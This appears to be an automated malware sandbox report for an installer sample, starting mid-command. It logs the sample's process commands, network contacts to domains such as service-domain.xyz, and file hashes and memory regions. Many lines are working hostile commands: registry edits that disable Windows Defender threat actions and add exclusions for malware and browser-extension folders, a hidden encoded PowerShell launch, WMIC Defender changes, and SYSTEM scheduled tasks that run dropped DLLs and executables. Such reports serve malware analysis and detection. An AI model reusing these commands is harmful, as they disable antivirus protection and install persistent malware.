Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gSFREmtFc" /SC once /ST 09:28:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gSFREmtFc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gSFREmtFc"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 11:21:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe\" F0 /GMsite_idmAX 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe F0 /GMsite_idmAX 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\aewiCMC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 05:24:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll\",#1 /YUsite_idAJG 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll",#1 /YUsite_idAJG 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll",#1 /YUsite_idAJG 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
DE 216.58.206.46:443 clients2.google.com tcp
US 44.239.141.158:80 api4.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/3416-8-0x0000000000AE0000-0x000000000119E000-memory.dmp

memory/3416-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/2388-13-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/2388-12-0x0000000003420000-0x0000000003456000-memory.dmp

memory/2388-14-0x00000000056F0000-0x0000000005700000-memory.dmp

memory/2388-15-0x00000000056F0000-0x0000000005700000-memory.dmp

memory/2388-16-0x0000000005D30000-0x000000000635A000-memory.dmp

memory/2388-17-0x0000000005A70000-0x0000000005A92000-memory.dmp

memory/2388-18-0x0000000005C10000-0x0000000005C76000-memory.dmp

memory/2388-24-0x0000000005C80000-0x0000000005CE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hy0axecc.aj0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2388-28-0x0000000006560000-0x00000000068B7000-memory.dmp

memory/2388-29-0x0000000006900000-0x000000000691E000-memory.dmp

memory/2388-30-0x0000000006940000-0x000000000698C000-memory.dmp

memory/2388-33-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/3416-37-0x0000000000AE0000-0x000000000119E000-memory.dmp

memory/3016-39-0x0000000000B30000-0x00000000011EE000-memory.dmp

memory/3016-40-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/1304-43-0x0000000073310000-0x0000000073AC1000-memory.dmp

memory/1304-44-0x0000000001A80000-0x0000000001A90000-memory.dmp

memory/1304-45-0x0000000001A80000-0x0000000001A90000-memory.dmp

memory/1304-54-0x0000000004B70000-0x0000000004EC7000-memory.dmp

memory/1304-55-0x0000000005160000-0x00000000051AC000-memory.dmp

memory/1304-58-0x0000000073310000-0x0000000073AC1000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 aebf4bf6752c28a76f012ad901a1b27e
SHA1 9609832f721f53d59f2d01b9d740649f44f965ea
SHA256 73316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512 dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50

memory/2272-60-0x0000000073310000-0x0000000073AC1000-memory.dmp

memory/2272-61-0x00000000036F0000-0x0000000003700000-memory.dmp

memory/2272-62-0x00000000036F0000-0x0000000003700000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cb05fea752fdc8d953aa1e59fb9a836a
SHA1 d727eaff2eb5cd7a2153f1652f86f591cf03bb9c
SHA256 3995a2e60f2c99b08a70e82a15a6a710153223f5cdeb7762108b424649cbc7bc
SHA512 52688106e4748583426e7f6472964d4f23e33e499b91a2339adef0813351c276130ac4f9a2cb6874399ce251a78bde30168ddad03a01d494dc58bd56cd8e9450

memory/2272-73-0x0000000073310000-0x0000000073AC1000-memory.dmp

memory/4728-77-0x00000160EEF40000-0x00000160EEF50000-memory.dmp

